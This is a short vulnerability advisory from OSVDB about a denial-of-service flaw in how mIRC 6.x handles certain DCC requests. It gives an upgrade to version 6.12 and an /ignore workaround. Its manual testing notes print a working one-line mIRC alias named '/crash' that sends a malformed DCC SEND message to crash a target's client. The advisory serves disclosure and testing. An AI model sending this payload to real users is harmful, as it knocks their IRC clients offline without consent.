mIRC Unspecified DCC Request

2003-10-13T06:29:24
ID OSVDB:2663
Type osvdb
Reporter OSVDB
Modified 2003-10-13T06:29:24

Description

Vulnerability Description

A flaw exists in version 6.x of mIRC that allows an attacker to cause a Denial of Service. This flaw exists in the way that mIRC handles certain DCC (Direct Client Connection)requests.

Solution Description

Upgrade to mIRC 6.12. This version can be obtained from http://www.mirc.com/get.html

A workaround to this issue is to type this in the chat window: /ignore -wd *

Short Description

A flaw exists in version 6.x of mIRC that allows an attacker to cause a Denial of Service. This flaw exists in the way that mIRC handles certain DCC (Direct Client Connection)requests.

Manual Testing Notes

Test the vulnerability by doing the following.

mIRC alias: /crash { .raw PRIVMSG $1 $+(:,$chr(1),DCC) send " $+ $str($rand(a,z) $+ $chr(32),250) $+ " 0 2130706433 $+(8192,$chr(1)) }

References:

Vendor Specific Advisory URL Secunia Advisory ID:10000 Related OSVDB ID: 2665 Related OSVDB ID: 2628 ISS X-Force ID: 13427 Generic Informational URL: http://www.mirc.com